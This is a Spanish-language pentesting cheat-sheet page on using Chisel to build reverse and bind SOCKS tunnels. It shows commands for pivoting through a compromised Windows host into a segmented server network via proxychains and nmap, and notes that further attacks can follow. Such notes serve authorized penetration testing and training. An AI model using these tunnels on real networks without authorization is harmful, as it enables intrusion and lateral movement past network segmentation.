> For the complete documentation index, see [llms.txt](https://docs.iwolfsec.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.iwolfsec.com/cheat-sheet/tuneles-y-conexiones-reversas/chisel.md).

# Chisel

## Reverse proxy socks con Chisel

```bash
#Server
./chisel server -p 8080 --reverse

#Client
./chisel client ip_server:8080 R:1082:socks
```

Hay que configurar proxychains para que salga por chisel

```bash
#/etc/proxychains.conf
socks5 127.0.0.1 1082

#Ejemplo
proxychains nmap -sT -Pn 10.0.0.220
```

## Proxy socks bind con Chisel

Esta situación puede darse cuando una red está segmentada de tal manera que el equipo de Windows (comprometido) tiene visibilidad sobre la red de servidores donde se quiere llegar, pero la visibilidad entre la máquina Kali y el Windows solo se realiza en el sentido kali→Windows.&#x20;

En este caso es posible utilizar Chisel para crear un túnel proxy socks bind, ya que como se ha comentado, la visibilidad entre el Kali y la máquina Windows comprometida solo se realiza en un sentido y la máquina Winows es la que tiene visbilidad con la red de servidores.

<figure><img src="https://3466771414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDvfkN71yF6JgtgQ5SC7C%2Fuploads%2FKKamAbDfsHDknrpXXiOI%2Ftunel_chisel_bind.png?alt=media&amp;token=e0427527-29bc-4628-a3b5-e933c20d9da3" alt=""><figcaption></figcaption></figure>

```bash
#chisel server
./chisel server -p 8080 --reverse

#chisel client
./chisel client 127.0.0.1:8080 R:0.0.0.0:socks
```

Esto dejará el equipo a la escucha por el puerto 1080 (puerto por defecto de chisel para crear un túnel socks)

En el kali, se configura proxychains (/etc/proxychains.conf) para que enrute el tráfico a través de la IP de la máquina Windows, donde se está ejecutando chisel y está la escucha en el 1080.

Con esto se obtendrá un túnel proxy socks bind&#x20;

{% code title="/etc/proxychains.conf" %}

```
socks5 172.0.0.156 1080
```

{% endcode %}

<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FWZkCXChahB4ojhfD2c62%2Fuploads%2F3Lzi1oJ0SyOn5029Sb36%2Fimage.png?alt=media&#x26;token=62fbedd4-5aa6-47e5-854c-801c89ed2ae7" alt=""><figcaption></figcaption></figure>

El resultado final es tener visibilidad sobre la red de servidores. (En este caso, se ha realizado un escaneo al puerto 1433 (MSSQL) de un servidor en la red 10.0.0.x)

<figure><img src="https://3466771414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDvfkN71yF6JgtgQ5SC7C%2Fuploads%2F5WeHhvC5ZA6GfoL4I9Jl%2Ftunel_chisel.png?alt=media&amp;token=6e19c5a1-18f7-4aed-8122-2b11baf0b081" alt=""><figcaption></figcaption></figure>

A partir de aquí, es posible lanzar cualquier ataque contra la red segmentada.

{% hint style="info" %}
Hay que tener en cuenta que las conexiones por defecto están bloquedas por el firewall de Windows. Por lo que cuando se levanta chisel en modo servidor para dejar a la escucha el puerto 1080,  habrá que permitir el acceso.
{% endhint %}

<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FWZkCXChahB4ojhfD2c62%2Fuploads%2F719xY1E37OdhxGdjgAs8%2Fimage.png?alt=media&#x26;token=aff359d8-c2c7-4922-9114-f2cc2c35bdb9" alt=""><figcaption></figcaption></figure>
